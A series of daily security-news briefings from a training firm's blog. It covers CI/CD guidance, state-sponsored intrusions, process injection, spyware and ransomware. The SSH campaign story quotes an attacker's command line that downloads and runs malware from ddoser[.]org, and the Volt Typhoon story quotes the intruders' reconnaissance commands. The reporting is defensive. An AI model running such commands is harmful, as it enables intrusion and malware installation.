Les Bell and Associates Pty Ltd
Site blog
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
CISA & NSA Release Guidance on Defending CI/CD Pipelines
The US Cybersecurity & Infrastructure Security Agency, together with the NSA, has released an information sheet - of 23 pages - on defending the Continuous Integration / Continuous Delivery (CI/CD) environments that form an essential part of DevOps and DevSecOps.
CI/CD sits at the confluence of a number of factors: the switch to cloud environments, deployment of applications using containers and Platform-as-a-Service architectures, and the application of automation and orchestration throughout the software development lifecycle. It provides a largely straight path from the source code repository where developers check in their code, through the build, test and deployment phases right into production.
As threat actors find it harder and harder to compromise production systems, so they have shifted their attention to the earlier steps in the software supply chain, prefering to compromise source code repositories and the other steps in the CI/CD pipeline. After helpfully defining terms - not every security pro has a development background, unfortunately, and those who do often left the field before the advent of DevOps - the 'sheet' moves on to enumerating the threats (based on the OWASP Top 10 CI/CD Security Risks) and the relevant attack surfaces, including:
- Insecure code
- Poisoned pipeline execution
- Insufficient pipeline access controls
- Insecure system configuration
- Usage of third-party services
- Exposure of secrets
This is followed by three interesting scenarios, and then suggested mitigations to harden CI/CD environments, such as:
- Using recommened cryptography
- Minimize the use of long-term credentials
- Signing the CI/CD configuration and verifying it throughout the process
- Requiring a second programmer to review and approve code as part of the check-in process
- Implementing the principle of least privilege for CI/CD access
- Carefully securing secrets, tokens and keys, including ensuring none are left embedded in code
- Proactively patching and updating CI/CD tools and the underlying systems
- Implementing security scanning tools such as static and dynamic testing early in the C/CD process
- Restricting untrusted libraries and tools
- Quickly removing temporary resources such as VM's and Kubernetes clusters after use
- Implementing software bill of materials (SBOM) and software composition analysis (SCA)
- Architecting, building and testing for resiliency
An appendix maps the various CI/CD threats to the MITRE ATT&CK framework tactics as well as a the D3FEND countermeasures. The information sheet also provides many links to additional guidance documents. I'd say this information sheet is required reading for the many information assurance pros whose developers have been tardy in inviting them to the DevOps party. Time to replace that with DevSecOps!
NSA and CISA, Defending Continuous Integration/Continuous Delivery (CI/CD) Environments, cybersecurity information sheet, June 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/06/28/cisa-and-nsa-release-joint-guidance-defending-continuous-integrationcontinuous-delivery-cicd and https://media.defense.gov/2023/Jun/28/2003249466/-1/-1/0/CSI_DEFENDING_CI_CD_ENVIRONMENTS.PDF.
Second Thoughts About AI?
The AI hype cycle is finally dying down, as more and more stories surface of embarrassing AI disasters such as the one that befell a lawyer who filed a ChatGPT-written document citing non-existent cases. Now, a new survey from Malwarebytes has revealed the initial enthusiasm for ChatGPT has faded, with 81% of respondents concerned about possible security and safety risks, 63% not trusting the information it produces and 51% wanting to see work on it paused while regulations catch up.
If you are familiar with Gartner's hype cycle, you probably agree: we've fallen from the Peak of Inflated Expectations to the Trough of Disillusionment.
As an AI enthusiast from the early 1970's (in the Department of Cybernetics at the University of Reading) I'd say that's unfortunate: the sins of commercial large language models (LLM's) should not be transferred to the many less ambitious and less spectacular applications of machine learning and AI that are making continuous incremental progress. In large part, the inflated expectations were inevitable as the public, who do not understand the internal operation of transformers and generative LLM's, poked and prodded at the beast and were amazed when it produced lucid and articulate responses. Surely something that speaks so fluidly - and at length, too! - must actually be intelligent!
Sorry - no.
When put to work on a bounded and high-quality corpus of traning material - for example, a database of legislation and regulations - such programs can do an excellent job of tasks such as summarization and abstraction as well as answering questions which demand only limited inference. I can see them being incredibly useful in GRC applications, for example, where they could spare analysts many hours of boring reading and searching to determine the consequences of various proposed actions.
Where ChatGPT and its ilk fall down is in two areas. Firstly, they train on the public world wide web (as it existed in 2021, in the case of GPT-3). And the web is notoriously full of misinformation, disinformation and outright malinformation. And secondly, being limited purely to statistical processing of words - knowing synonyms, how frequently words appear, how often they appear in various combinations, etc. - and not their meanings, LLM's can't tell fact from fiction, so happily treat the two the same way.
And when processing case law or academic papers, for example, the LLM's record things like the types of names that appear in case titles (some companies, some inviduals, etc.) and the styles of paper titles, author names and their related institutions, reference styles, etc.. When spinning words around to create output, they will quite happily pick relevant words and spin them into plausible-sounding cases and papers - a process referred to as AI hallucination.
This process is likely to get worse, as the use of generative LLM's by news aggregation sites, and especially disinformation sites, rapidly increases on the web. As other LLM's train on this data, so a feedback loop will develop in which AI trains on AI-generated text. Can you spell, garbage in, garbage out?
A recent paper by Shumailov et. al. (with Ross Anderson, of "Security Engineering fame, as one of the co-authors) addresses this very topic, finding that "model-generated content in training causes irreversible defects in the resulting models, where tails of the original content distribution disappear. We refer to this effect as Model Collapse and show that it can occur in Variational Autoencoders, Gaussian Mixture Models and LLMs. We build theoretical intuition behind the phenomenon and portray its ubiquity amongst all learned generative models".
In short, LLM's have their place, and as long as they stay in it and aren't unleashed to roam the world wide web, they are going to perform valuable work, including in security-related areas such as compliance assurance, software development (essentially a transformation problem from problem specification to executable code), automated malware analysis (explicating what machine code does and is likely intended to achieve), etc. But let's keep our expectations in check, mmmkay?
Shunailov, Ilia, The Curse of Recursion: Training on Generated Data Makes Models Forget, arXiv preprint, 31 May 2023. Available online at https://arxiv.org/abs/2305.17493v2.
Stockley, Mark, 81% concerned about ChatGPT security and safety risks, Malwarebytes survey shows, blog post, 27 June 2023. Available online at https://www.malwarebytes.com/blog/news/2023/06/chatgpt.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
New Process Injection Technique Can Bypass Detection by EDR Products
An increasingly common technique used by malware authors to evade detection is process injection. This replaces the code of an existing, trusted system process with malicious code, injected by the attacker. Because the code is executing within the context of a trusted process, it will be hard for security tools to detect it, and in some cases the technique allows completely file-less exploitation, leaving behind no artifacts on the victim's disk to be examined by malware analysts.
A new process injection technique developed by researchers at Israeli security firm Security Joes is able to evade detection by endpoint detection and response (EDR) applications. The new technique, which its developers call "Mockingjay", does not use Windows API calls such as VirtualAlloc(), VirtualAllocEx(), WriteProcessMemory() and others, which EDR applications typically hook as a means of detecting and blocking their use.
Instead, their new technique leverages a vulnerable dynamic link library - one which possesses a default Read/Write/Execute (RWX) memory section, which can then be abused to inject the desired code. Since the DLL already has RWX memory, this eliminates the need to make calls to memory allocation API's or NtWriteVirtualMemory() and NtProtectVirtualMemory(), which are also closely monitored by EDR software.
The researchers wrote a tool to search the entire Windows filesystem in search of such a DLL, and found one: msys-2.0.dll, which is part of Visual Studio 2022 Community Edition. This DLL has 16 KB of available RWX available - an ideal space for code injection and execution.
The next step was to find a method that could leverage this without making the monitored API calls. Their first approach is to load the vulnerable DLL directly and then find the RWX memory area, using the LoadLibraryW() and GetModuleInformation() system calls. In a proof-of-concept, this was then used to run code, based on the Hell's Gate technique, to create a system call stub and then jump directly into system API's in order to unhook the EDR hooks and allow further activity without observation.
A second approach is to perform process injection on a remote process, again relying on the RWX memory section in msys-2.0.dll. It turns out that this DLL is commonly used by applications that require POSIX emulation, such as GNU utilities, some of which are found in Visual Studio 2022 Community Edition. For their proof-of-concept, the researchers successfully injected code into the ssh.exe (Secure Shell) process, causing it to load yet another DLL which created a reverse shell to a remote machine. The only limitation of this technique is that targeted DLL (in this case msys-2.0.dll) cannot use Address Space Layout Randomization (ASLR) as this would require dyanmic resolution of the address of the RWX memory section.
The Security Joes blog article contains a detailed write-up which is effectively a well-written tutorial on process injection techniques. It also provides some recommendations on detection techniques.
Peixoto, Thiago, Felipe Duarte and Ido Naor, Process Mockingjay: Echoing RWX In Userland To Achieve Code Execution, blog post, 27 June 2023. Available online at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.
Europol Investigation Leads to 6,558 Arrests
Back in 2020, French and Dutch police forces were able to infiltrate the operations of EncroChat, an encrypted mobile messaging service that offered its users - mainly criminals - hardened Android phones with just the features they needed: strong encryption, rapid device erasure with a specific PIN or remote deletion by the EncroChat help desk and a tamper-proof boot process. Despite the high price of both the device and its subscription service, EncroChat sold like hot cakes, with tens of thousands of users world wide.
The Joint Investigation Team established by the French and Dutch authorities with assistance from Eurojust and Europol was able to intercept, share and analyse over 115 million criminal conversations, by over 60,000 users. Based on the accumulated statistics from the many countries who used the shared data over the next three years, the results are:
- 6,558 suspects arrested, including 197 High Value Targets
- 7,134 years of imprisonment of convicted criminals up to now
- €739.7 million in cash seized
- €154.1 million frozen in assets or bank accounts
- 30.5 million drug pills seized
- 103.5 tonnes of cocaine seized
- 163.4 tonnes of cannabis seized
- 3.3 tonnes of heroin seized
- 971 vehicles seized
- 271 estates or homes seized
- 923 weapons seized, as well as 21 750 rounds of ammunition and 68 explosives
- 83 boats and 40 planes seized
The investigation, conducted at Europol's headquarters under the name "Operational Task Force EMMA", also prevented violent attacks, attempted murders, large-scale drug importations and corruption. And while many of EncroChat's customers fled to another service called SkyECC, this was also penetrated and dismantled in 2021.
All in all, an impressive result.
Europol, Dismantling encrypted criminal EncroChat communications leads to over 6 500 arrests and close to EUR 900 million seized, news release, 27 June 2023. Available online at https://www.europol.europa.eu/media-press/newsroom/news/dismantling-encrypted-criminal-encrochat-communications-leads-to-over-6-500-arrests-and-close-to-eur-900-million-seized.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Chinese APT Targets Critical Infrastructure, OT
Researchers at managed security provider Crowdstrike have released on an incident involving a Chinese-nexus threat actor which they track as VANGUARD PANDA (also known as Volt Typhoon). The cyber-espionage group consistently targets Zoho ManageEngine ADSelfService Plus in order to obtain initial access, after which they deploy webshells and make use of living-off-the-land techniques to avoid leaving behind detectable artifacts which could be used as IOC's.
In this particular incident, Crowdstrike's Falcon Complete managed-detection-and-response was triggered by suspicious reconnaissance commands - such as listing processes, testing network connectivity, gathering user and group information, and using WMI to enumerate domain trust and DNS zones - executed under an Apache Tomcat web application server running ManageEngine ADSelfService Plus. The use of these commands indicated a familiarity with the target environment, as the commands were executed rapidly and used specific internal hostnames and passwords:
cmd /C "tasklist /svc"
cmd /C "ping -n 1 [redacted]"
cmd /C "ping -n 1 -a [redacted]"
cmd /C "net group "domain controllers" /dom"
cmd /C "net use \\[redacted]\admin$ REDACTED /u:[redacted]"
cmd /C "dir \\[redacted]\c$\Users"
cmd /C "wmic /node:[redacted] /user:[redacted] /password:"<removed>" process call create "cmd /c nltest /DOMAIN_TRUSTS >>C:\Users\[redacted]\AppData\Local\[redacted].tmp""
cmd /C "dir \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "type \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "wmic /node:[redacted] /user:[redacted] /password:"<removed>" process call create "cmd /c Dnscmd . /EnumZones >>C:\Users\[redacted]\AppData\Local\Temp\[redacted].tmp""
cmd /C "dir \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "type \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
At this point the Crowdstrike team quickly quarantined and triaged the host, notifying the impacted customer while analysing the Apache Tomcat access logs. This revealed multiple POST requests to the file /html/promotion/selfsdp.jspx which, upon analysis, turned out to be a webshell capable of running arbitrary commands by using the /C option of the classic Windows shell, cmd.exe and the ProcessBuilder class. It also attempted to masquerade as part of ManageEngine ADSelfService Plus, using that as its page title and adding legitimate links to help desk software. In fact, selfsdp.jspx will match the EncryptJSP YARA rule provided in a May CISA advisory on Volt Typhoon.
However, a lot of red flags remained: for example, the use of hostnames above indicated a lot of prior reconnaisance and enumeration and the inclusion of passwords indicated that admin accounts had already been compromised - likely before the Falcon Complete sensor had been installed. In fact, the selfsdp.jspx webshell had been written to disk almost six months before the Falcon sensor was installed, and examination of the Apache Tomcat logs correlated its installation with an HTTP POST request to /html/error.jsp - but that file no longer existed, indicating its deletion in an attempt to evade detection and analysis. A lot of related log entries had also vanished - on one day, the entire first 12 hours of the access log had gone.
To cut a long story short - Crowdstrike's blog article provides the full details - the threat actor eventually slipped up. .jsp and .jspx pages - Java Server Pages - contain scriptlets of Java code which are extracted to create .java Java source code files and then compiled into the corresponding .class bytecode files for execution. This is done by a component of Apache Tomcat - the Jasper 2 JSP engine - which places the .java and .class files in a separate directory structure, and while the intruder cleaned up the log files and other artifacts, they missed these.
One of them, ListName_jsp.java, in turn deployed a backdoored version of the tomcat-websocket.jar Apache Tomcat library incorporating a webshell. This was then timestamped to match the timestamp on the original tomcat-websocket.jar file so that it would appear not to have been replaced (although obviously a filesystem verification program would detect its changed digest value).
The Crowdstrike blog article makes fascinating reading and includes some recommendations for detection and mitigation of this attack, which is just one of many the firm has seen against US-based critical infrastructure.
CISA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, cybersecurity advisory AA23-144a, 24 May 2023. Available online at https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a.
Falcon Complete Team, Business as Usual: Falcon Complete MDR Thwarts Novel VANGUARD PANDA (Volt Typhoon) Tradecraft, blog post, 22 June 2023. Available online at https://www.crowdstrike.com/blog/falcon-complete-thwarts-vanguard-panda-tradecraft/.
Cozy Bear At It Again
In a series of tweets, Microsoft Threat Intelligence has reported a rise in credential attack activity by the Russian state-sponsored APT29, a.k.a. Cozy Bear and NOBELIUM, which the Redmondites track as Midnight Blizzard (I wish they would stick to bears and pandas - it makes life a lot easier!). The attacks target governments, IT service providers, NGO's, defense contractors and critical manufacturing, using a variety of password spray, brute force and token theft techniques, as well as session replay attacks using stolen session credentials likely acquired via illicit sale in dark web markets or Telegram channels.
In this campaign the threat actor is using residential proxy services to hide the real source of their attacks. Residential proxies are a low-cost or free proxies provided by a variety of service providers - I have even seen home users being invited to install proxy servers under the pretext that it will get them additional bandwidth (it won't) or in return for a small income. The problem is that the main purpose of such proxies is to disguise the source of online activities for a variety of dodgy or disreputable activities (which means that home users who naively install them are likely to see their IP addresses blacklisted), although they do have a few legitimate uses, especially in states which restrict their citizens' access to information.
APT29's use of residential proxies for a brief period before moving on also makes it harder for defenders to distinguish these attacks from legitimate traffic and block them.
Microsoft Threat Intelligence, "Microsoft has detected increased credential attack activity...", Twitter thread, 22 June 2023. Available online at https://twitter.com/MsftSecIntel/status/1671579358031486991.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
GIFShell Attack Exploits Teams; Exfiltrates Data Through MS Servers
A new exfiltration technique allows attackers who compromise Microsoft Teams users to exfiltrate data through Microsoft's own servers, making the exfiltration hard to spot by endpoint security products and firewalls, since it looks like legitimate Teams traffic.
The technique, named GIFShell, uses a reverse shell that delivers malicious commands via base64 encoded GIF files in Teams, and exfiltrates the output, also as GIF's, via the Teams infrastructure. The attacker must first somehow convince a user to install a malicious backdoor that executes commands and uploads the results via a GIF URL to a Teams webhook. The backdoor scans the Teams logs for messages with a GIF, extracts the base64 encoded commands and executes them, converting the output to base64 text which is used as the filename for a remote GIF embedded in a Microsoft Teams Survey card that is submitted to the attacker's public webhook.
Microsoft has acknowledged the GIFShell attack, but will not issue a fix, stating that no security boundaries were bypassed, this being a post-exploitation technique.
Johnson, Mic, Understanding the Microsoft Teams Vulnerability: The GIFShell Attack, Latest Hacker News, 20 June 2023. Available online at https://latesthackingnews.com/2023/06/20/understanding-the-microsoft-teams-vulnerability-the-gifshell-attack/.
Verizon 2023 DBIR Available
From the "Dammit - we meant to post this weeks ago" department: Verizon's annual Data Breach Investigations Report is always an interesting read, and we go hunting for it every April/May, when it usually appears. This year's appeared a few weeks ago and is, as usual, very informative. Some interesting factoids:
- 83% of breaches involved external actors, with the majority of attacks financially-motivated, while 19% involved internal actors (sometimes unintentionally though misuse or human error)
- 24% of all breaches involved ransomware; it was used in 62% of incidents committed by organized crime and 59% of financially-motivated incidents
- 50% of all social engineering incidents used pretexting - scenrios invented to trick the victim into giving up information or doing something to enable a breach
- 74% of breaches involve human facors: errors, privilege misuse, theft of credentials or social engineering
- 95% of breaches are financially motivated
It certainly seems like we could obtain high returns from increased efforts in the human factors (education, training and awareness) aspects of our business.
Uncredited, 2023 Data Breach Investigations Report, Verizon, 2023. Available online at https://www.verizon.com/business/en-au/resources/reports/dbir/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
NSA Issues Guidance on BlackLotus
The National Security Agency has issued a mitigation guide for the BlackLotus bootkit. We reported on BlackLotus back in March, following an initial report from ESET, although the malware had been available since at least October 2022. It works by exploiting CVE-2022-21894, a vulnerability which was fixed by Microsoft in their January 2022 updates. However, the affected binaries were not added to the UEFI Secure Boot Deny List Database (DBX), and BlackLotus works by carrying its own copies of those older binaries - a technique referred to as "Baton Drop"
The NSA guide recommends a number of actions:
- Update recovery media and activate optional mitigations
- Harden defensive policies
- Monitor device integrity measurements and boot configuration
- Customize UEFI Secure Boot
It is important to bear in mind that BlackLotus is not a firmware implant, but a bypass of the secure boot process, and it can be removed or quarantined. Currently, it is only known to affect Windows 10 and 11;, but fixes are also available for Windows 8.1. Although BlackLotus does contain some Linux boot binaries, Linux is not one of its targets. Linux admins can defend their systems by removing the Microsoft Windows Production CA 2011 certificate from Secure Boot's DB.
National Security Agency, BlackLotus Mitigation Guide, cybersecurity information, ver 1.0, June 2023. Available online at https://media.defense.gov/2023/Jun/22/2003245723/-1/-1/0/CSI_BlackLotus_Mitigation_Guide.PDF.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Apple Issues Urgent Patches for 0days
Apple has issued urgent patches for two vulnerabilities in the iOS and iPadOS mobile device operating systems, in response to claims the vulnerabilities are being exploited in the wild.
The vulnerabilities are
- CVE-2023-32434: Integer overflow in the kernel due to inadequate input violation
- CVE-2023-32439: Type confusion in Webkit
The vulnerabilities were used by an implant, discovered by Kaspersky Researchers and claimed to be part of a campaign which they have named Operation Triangulation. CVE-2-23-32434 is used during initial exploitation, in order to gain root privileges before deploying the implant in memory - as a result, the implant cannot survive a reboot, and the attackers have to install it again by sending an iMessage with a malicious attachment. If the device is not rebooted, the implant normally removes itself after 30 days, although this can be extended.
Once running, the implant communicates with its C2 server via a RESTful HTTPS API, implemented with the Protobuf library. All traffic takes the form of key-value pairs, encrypted with either 3DES or RSA. The implant sends heartbeat messages, while the C2 server sends any of 24 commands for
- Interacting with the filesystem (creation, modification, exfiltration and removal of files)
- Interacting with processes (listing and terminating them)
- Dumping the victim’s keychain items, which can be useful for harvesting victim credentials
- Monitoring the victim’s geolocation
- Running additional modules, which are Mach-O executables loaded by the implant. These executables are reflectively loaded, with their binaries stored only in memory
The implant is written in Objective-C, which leaves some debugging information, such as the names of class members and methods, in the generated binary. Curiously, many of the resources accessed and operations performed by the implant are given database-related names - for example, a directory is referred to as a table, while a file is called a record, and the C2 server is a DB server - which led the Kaspersky researchers to name the implant TriangleDB.
Kucherin, Georgy, Leonid Bezvershenko and Igor Kuznetsov, Dissecting TriangleDB, a Triangulation spyware implant, blog post, 21 June 2023. Available online at https://securelist.com/triangledb-triangulation-implant/110050/.
Useful Ransomware Educational Resources
With ransomware being seen by the business community as one of the biggest, if not the biggest, current security threat, it is important to keep ourselves and our business principals well-informed about its evolution. A couple of useful resources have appeared in the last couple of days to assist with this.
First, Sophos has started to release a three-part documentary series entitled "Think You Know Ransomware?", compiled from over 100 hours of interviews with cybercriminals, security experts, industry analysts and policy makers. The first episode, "Origins of Cybercrime" is now available, with episodes 2 and 3 due for release over the next two weeks.
Meanwhile, at the Infosecurity Europe conference, Richard de la Torre, marketing manager at Bitdefender, gave a talk on the myths and misconceptions which surround ransomware. In his talk he describes how proactive defenders are making use of threat intelligence to prevent or disrupt attacks, as well as increasingly using decryptors to recover data. However, as de la Torre points out, ransomware operators are now putting much more effort into information exfiltration, taking time to stealthily move throughout the victim's networks, identifying the most valuable datasets as well as discovering whether they have cyber insurance.
Sophos, Think You Know Ransomware?, documentary series, June 2023. Available online at https://www.sophos.com/en-us/content/ransomware-documentary.
Raywood, Dan, Ransomware Misconceptions Abound, To the Benefit of Attackers, Dark Reading, 22 June 2023. Available online at https://www.darkreading.com/vulnerabilities-threats/ransomware-misconceptions-abound-to-the-benefit-of-attackers.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Attacks on Poorly-Secured Linux Servers via sshd
Security researchers at South Korea's AhnLab Security Emergency Response Center have uncovered a campaign being run by an unknown threat actor against poorly-managed Linux servers via the SSH daemon (sshd). Once the actor has gained initial access, they install a range of malware, including the Tsunami DDoS bot, ShellBot, the XMRig Monero cryptominer and Log Cleaner.
Initial access seems to be gained through a brute force attack using common weak credentials (seriously - who uses "abcdefghi" or "123@abc" as a password on the root account?). From this point, a command line is pasted in which downloads and runs a variety of malware:
# nvidia-smi –list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O – ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &
Some of the commands here are obviously meant to enumerate hardware such as GPU's which could be used for cryptomining as well as to profile the machine, while the wget commands download the attacker's malware and tools. One of these is a shell script called key which, when run, performs some cleanup and also inserts a public key into the compromised account's ~/.ssh/authorized_keys file, allowing the actor to persist even if the weak password is changed.
The other malware is:
Download URL | Malware |
---|---|
ddoser[.]org/key | Downloader Bash |
ddoser[.]org/logo | ShellBot DDoS Bot |
ddoser[.]org/siwen/bot | ShellBot DDoS Bot |
ddoser[.]org/siwen/a | Tsunami DDoS Bot |
ddoser[.]org/siwen/cls | MIG Logcleaner v2.0 |
ddoser[.]org/siwen/clean | 0x333shadow Log Cleaner |
ddoser[.]org/siwen/ping6 | Privilege escalation malware |
ddoser[.]org/top | XMRig CoinMiner (compressed file) |
ASEC's report provides a complete rundown on this list of malware.
There's an obvious lesson here: SSH is mostly used for system administration, and administrators should be smart enough to know better. Passwords are a losing proposition - weak passwords especially so - and setting up public-key authentication with OpenSSH and PuTTY is very easy, after which password logins can be disabled completely, by setting
PasswordAuthentication no
in /etc/ssh/sshd_config. After that, one can sleep easily because this, and similar distributed, password brute-forcing campaigns will simply not work.
Sanseo, Tsunami DDoS Malware Distributed to Linux SSH Servers, blog post, 20 June 2023. Available online at https://asec.ahnlab.com/en/54647/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
US Government Pursues Ransomware Operators
The US Government is continuing to pursue ransomware operators around the world. In their latest success, the US Department of Justice has announced the FBI's arrest of a 20-year-old Russian national, Ruslan Magomedovich Astamirov in connection with LockBit ransomware operations.
'According to a criminal complaint obtained in the District of New Jersey, from at least as early as August 2020 to March 2023, Astamirov allegedly participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud and to intentionally damage protected computers and make ransom demands through the use and deployment of ransomware. Specifically, Astamirov directly executed at least five attacks against victim computer systems in the United States and abroad.
'"Astamirov is the third defendant charged by this office in the LockBit global ransomware campaign, and the second defendant to be apprehended,” said U.S. Attorney Philip R. Sellinger for the District of New Jersey. “The LockBit conspirators and any other ransomware perpetrators cannot hide behind imagined online anonymity. We will continue to work tirelessly with all our law enforcement partners to identify ransomware perpetrators and bring them to justice."'
Astamirov is the second LockBit-affiliated Russian to be arrested.
Meanwhile, as the CL0P gang continues to exploit the MOVEit Transfer file transfer software and starts to extort the victims, the US State Department's Rewards for Justice program is offering up to $US10 million in rewards leading to the identification or location of CL0P and similar groups.
Uncredited, Russian National Arrested and Charged with Conspiring to Commit LockBit Ransomware Attacks Against U.S. and Foreign Businesses, US Department of Justice, 15 June 2023. Available online at https://www.justice.gov/opa/pr/russian-national-arrested-and-charged-conspiring-commit-lockbit-ransomware-attacks-against-us.
Rewards for Justice, "Advisory from @CISAgov, @FBI: ... ", tweet, 17 June 2023. Available online at https://twitter.com/RFJ_USA/status/1669740545403437056.
Android RAT Masquerades as Chat Apps
Researchers at ESET have been tracking an updated version of the GravityRAT spyware for Android, which is being distributed as trojaned versions of the messaging apps BingeChat and Chatico. These apps have never been distributed via the Google Play store, but instead are being promoted through malicious web sites - although how victims are lured to them is unknown.
GravityRAT has been around since at least 2015, and is a cross-platform remote access trojan, with versions for Windows, macOS and Android; its operator is unknown but possibly based in Pakistan, as it focuses on Indian targets. ESET tracks the threat actor as SpaceCobra.
This new variant actually does provide chat functionality, being based on the open-source OMEMO Instant Messenger app, but before the user even logs in to the app, it has already contacted its C2 server, exfiltrating the user's data and waiting for commands. GravityRAT can exfiltrated call logs, the user's contact list, SMS messages, various types of files and the device locations; the new variant can also delete files, contacts and call logs. It is also capable of exfiltrating backup files created by WhatsApp Messenger, which is extremely popular in India.
The ESET report contains IOC's and a mapping to MITRE ATT&CK techniques.
Stefanko, Lukas, Android GravityRAT goes after WhatsApp backups, blog post, 15 June 2023. Available online at https://www.welivesecurity.com/2023/06/15/android-gravityrat-goes-after-whatsapp-backups/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Ransomware Permanently Closes Hospital
A salutory tale about cyber resilience, business continuity and the risk posed by ransomware: CBS News reports that a hospital in Central Illinois is closing down, at least in part due to a ransomware attack.
St, Margaret's Health, which operates in the city of Spring Valley, Illinois, will shut down today, blaming a devastating ransomware attack in 2021 which prevented it from filing insurance claims. This seems to be the first time that a hospital has blamed cybercriminals for its closure, although other factors, such as staffing costs and supply chain issues, also played a part.
